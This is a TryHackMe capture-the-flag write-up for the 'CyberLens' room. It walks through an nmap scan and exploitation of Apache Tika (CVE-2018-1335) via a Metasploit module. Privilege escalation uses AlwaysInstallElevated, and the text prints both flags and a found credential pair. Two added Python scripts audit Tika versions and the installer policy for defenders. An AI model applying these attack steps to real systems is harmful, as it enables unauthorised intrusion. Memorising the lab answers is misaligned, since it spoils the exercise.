
TryHackMe Writeup - CyberLens Room

☕ 4 min read · 👨‍💻 g4nd1v


Title: CyberLens
Description: Can you exploit the CyberLens web server and discover the hidden flags?
Difficulty: Easy
Makers: TeneBrae93 and tgreenMWR

Nmap

└─$ cat nmap/cyberlens.nmap
# Nmap 7.94SVN scan initiated Fri May 31 20:57:25 2024 as: nmap -sC -sV -oA nmap/cyberlens 10.10.94.45
Nmap scan report for 10.10.94.45
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-01T00:58:10+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-01T00:58:01+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-31T00:52:22
|_Not valid after:  2024-11-30T00:52:22
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-06-01T00:58:03
|_  start_date: N/A

User Flag

As there is an SMB service running, I tried logging in with an empty password, but got “Access Denied”:

└─$ smbclient -L \\10.10.116.165
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED

The next thing I did was visit the homepage of the website. It has a file-upload feature with a button next to it labelled “Get Metadata”, so I uploaded a sample JPEG image for testing.
Pasted image 20240619214837
Here is the result for the uploaded file:

{
  "Component 1": "Y component: Quantization table 0, Sampling factors 2 horiz/2 vert",
  "Component 2": "Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert",
  "Component 3": "Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert",
  "Compression Type": "Baseline",
  "Content-Type": "image/jpeg",
  "Data Precision": "8 bits",
  "File Modified Date": "Thu Jun 20 01:46:46 +00:00 2024",
  "File Name": "apache-tika-12826399836580280142.tmp",
  "File Size": "27437 bytes",
  "Image Height": "460 pixels",
  "Image Width": "460 pixels",
  "Number of Components": "3",
  "Number of Tables": "4 Huffman tables",
  "X-Parsed-By": [
    "org.apache.tika.parser.DefaultParser",
    "org.apache.tika.parser.jpeg.JpegParser"
  ],
  "language": "",
  "tiff:BitsPerSample": "8",
  "tiff:ImageLength": "460",
  "tiff:ImageWidth": "460"
}

The file was parsed by Apache Tika, as the X-Parsed-By field shows (org.apache.tika.parser.DefaultParser and org.apache.tika.parser.jpeg.JpegParser), and a quick search turned up CVE-2018-1335 (more about the CVE: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/).
The page source also shows that the client sends a PUT request straight to http://cyberlens.thm:61777/meta:

  <script>
    document.addEventListener("DOMContentLoaded", function() {
      document.getElementById("metadataButton").addEventListener("click", function() {
        var fileInput = document.getElementById("imageFileInput");
        var file = fileInput.files[0];

        var reader = new FileReader();
        reader.onload = function() {
          var fileData = reader.result;

          fetch("http://cyberlens.thm:61777/meta", {
            method: "PUT",
            body: fileData,
            headers: {
              "Accept": "application/json",
              "Content-Type": "application/octet-stream"
            }
          })
          .then(response => {
            if (response.ok) {
              return response.json();
            } else {
              throw new Error("Error: " + response.status);
            }
          })
          .then(data => {
            var metadataOutput = document.getElementById("metadataOutput");
            metadataOutput.innerText = JSON.stringify(data, null, 2);
          })
          .catch(error => {
            console.error("Error:", error);
          });
        };

        reader.readAsArrayBuffer(file);
      });
    });
  </script>
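The metadata response above tells you the backend is tika-server, but not which version is running. Here is an added Python example (my code, not part of the original writeup or of Apache Tika) that does the two checks a defender would run against such an exposed endpoint: read the version banner and compare it against the range the CVE-2018-1335 advisory names (1.7 through 1.17, fixed in 1.18), and reduce a /meta response to the fields that fingerprint the backend. It assumes tika-server's standard REST endpoints, GET /version returning a banner like "Apache Tika 1.17" and the PUT /meta call the page's script makes; the sample response is constructed from the JSON shown earlier, and the host and port are the ones in the page source.

```python
"""Fingerprint an exposed tika-server and check its version against CVE-2018-1335.

Added example, not part of the original writeup. Assumes the standard
tika-server REST endpoints: GET /version (banner "Apache Tika X.Y") and
PUT /meta (metadata JSON, as the page's browser client receives).
"""
import json
import re
import urllib.request

# CVE-2018-1335 (header command injection in tika-server): affected 1.7 through 1.17, fixed in 1.18.
VULN_MIN = (1, 7)
VULN_MAX = (1, 17)

# Placeholder taken from the page source; not a live host.
DEFAULT_BASE_URL = "http://cyberlens.thm:61777"


def parse_tika_version(banner: str):
    """Extract a numeric version tuple from a /version banner, or None if it is not Tika."""
    m = re.search(r"Apache Tika\s+(\d+(?:\.\d+)+)", banner)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def version_in_cve_2018_1335_range(banner: str) -> bool:
    """True if the banner's major.minor falls inside the advisory's affected range."""
    v = parse_tika_version(banner)
    if v is None:
        return False
    return VULN_MIN <= v[:2] <= VULN_MAX


def summarize_meta(meta_json: str) -> dict:
    """Reduce a /meta response to the fields that identify the backend.

    X-Parsed-By is a list when several parsers ran and a plain string otherwise,
    so both shapes are normalised. The temp-file name Tika reports also leaks
    that uploads are spooled to disk as apache-tika-*.tmp.
    """
    meta = json.loads(meta_json)
    parsers = meta.get("X-Parsed-By", [])
    if isinstance(parsers, str):
        parsers = [parsers]
    return {
        "content_type": meta.get("Content-Type"),
        "parsers": parsers,
        "tika_server": any(p.startswith("org.apache.tika.parser.") for p in parsers),
        "tmp_name_leaked": str(meta.get("File Name", "")).startswith("apache-tika-"),
    }


def fetch_version(base_url: str = DEFAULT_BASE_URL, timeout: float = 5.0) -> str:
    """GET /version from a live tika-server (network call; not exercised offline)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/version", timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def fetch_meta(data: bytes, base_url: str = DEFAULT_BASE_URL, timeout: float = 5.0) -> str:
    """Mirror the page's browser client: PUT raw bytes to /meta and ask for JSON back."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/meta",
        data=data,
        method="PUT",
        headers={"Accept": "application/json", "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample, trimmed from the metadata JSON the writeup shows.
SAMPLE_META = json.dumps({
    "Content-Type": "image/jpeg",
    "File Name": "apache-tika-12826399836580280142.tmp",
    "X-Parsed-By": ["org.apache.tika.parser.DefaultParser",
                    "org.apache.tika.parser.jpeg.JpegParser"],
})

if __name__ == "__main__":
    print(summarize_meta(SAMPLE_META))
    for banner in ("Apache Tika 1.17", "Apache Tika 1.18", "Apache Tika 2.9.2"):
        flag = "in CVE-2018-1335 range" if version_in_cve_2018_1335_range(banner) else "not in range"
        print(f"{banner}: {flag}")
```

Running the module offline prints the fingerprint of the sample response and the range check for three banners; point fetch_version at a real tika-server to feed its banner into version_in_cve_2018_1335_range. The comparison deliberately uses only major.minor, so a patch release such as 1.17.1 is still reported as affected.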

I searched for this exploit in Metasploit and luckily there is a module for it.

msf6 > search apache tika

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection
msf6 > use 0

Here are the options:
Pasted image 20240619220215
Now, run the exploit:
Pasted image 20240619220253

C:\Users\CyberLens\Desktop>type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}

Root Flag

There is a text file in the Management folder; it says:

C:\Users\CyberLens>type Documents\Management\CyberLens-Management.txt
Remember, manual enumeration is often key in an engagement ;)

CyberLens
HackSmarter123

I don't think this file is that useful, though. Next, I moved the shell to the background with background and ran post/multi/recon/local_exploit_suggester to look for local privilege-escalation exploits. It reported several candidates.
Pasted image 20240619221514
This one is definitely usable: exploit/windows/local/always_install_elevated: The target is vulnerable.
Setting the options:
Pasted image 20240619221740
Running the exploit:
Pasted image 20240619221903

C:\Users\Administrator\Desktop>type admin.txt
THM{3lev@t3D-4-pr1v35c!}
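The suggester module only reports that the AlwaysInstallElevated policy is on; as an added Python example (my code, not part of the original writeup or of Metasploit), here is the check an administrator would run to audit and explain that finding. Windows Installer runs packages with SYSTEM privileges only when the DWORD AlwaysInstallElevated is 1 under the Installer policy key in both HKLM and HKCU, so the decision is kept as a pure function that can be tested off-box; the registry reader uses the standard-library winreg module and therefore only runs on Windows. The values used when not on Windows are constructed to mirror what the suggester reported on the target.

```python
"""Audit the AlwaysInstallElevated policy that local_exploit_suggester flagged.

Added example, not part of the original writeup or of Metasploit.
Windows Installer elevates every MSI to SYSTEM only when the DWORD
AlwaysInstallElevated is 1 under BOTH of these keys:
  HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
  HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
"""
import sys
from typing import Optional, Tuple

INSTALLER_POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def always_install_elevated_enabled(hklm: Optional[int], hkcu: Optional[int]) -> bool:
    """True only if both hives set the value to 1.

    The policy applies machine-wide AND per-user; a single hive set to 1 is
    not enough. None means the key or value is absent, which Windows treats
    as disabled.
    """
    return hklm == 1 and hkcu == 1


def read_policy_values() -> Tuple[Optional[int], Optional[int]]:
    """Read both hive values on Windows. Returns (hklm, hkcu), each an int or None."""
    if sys.platform != "win32":
        raise OSError("registry audit only runs on Windows")
    import winreg  # standard library, Windows only

    def read(hive) -> Optional[int]:
        try:
            with winreg.OpenKey(hive, INSTALLER_POLICY_KEY) as key:
                value, kind = winreg.QueryValueEx(key, VALUE_NAME)
                return int(value) if kind == winreg.REG_DWORD else None
        except FileNotFoundError:  # key or value missing: policy not configured
            return None

    return read(winreg.HKEY_LOCAL_MACHINE), read(winreg.HKEY_CURRENT_USER)


def audit_report(hklm: Optional[int], hkcu: Optional[int]) -> str:
    """One-line finding plus the remediation a practitioner would hand over."""
    state = "VULNERABLE" if always_install_elevated_enabled(hklm, hkcu) else "ok"
    return (
        f"{state}: HKLM {VALUE_NAME}={hklm!r}, HKCU {VALUE_NAME}={hkcu!r}. "
        "Remediation: set both values to 0 (or delete them) and enforce it via GPO: "
        "Computer Configuration and User Configuration > Administrative Templates > "
        "Windows Components > Windows Installer > 'Always install with elevated privileges' = Disabled."
    )


if __name__ == "__main__":
    try:
        hklm, hkcu = read_policy_values()
    except OSError:
        # Constructed values mirroring the state the suggester reported on the target.
        hklm, hkcu = 1, 1
    print(audit_report(hklm, hkcu))
```

On a Windows host the script reads the live registry; elsewhere it falls back to the constructed values so the report logic can still be exercised. The same two values can be confirmed from a command prompt with reg query on each hive's Installer policy key.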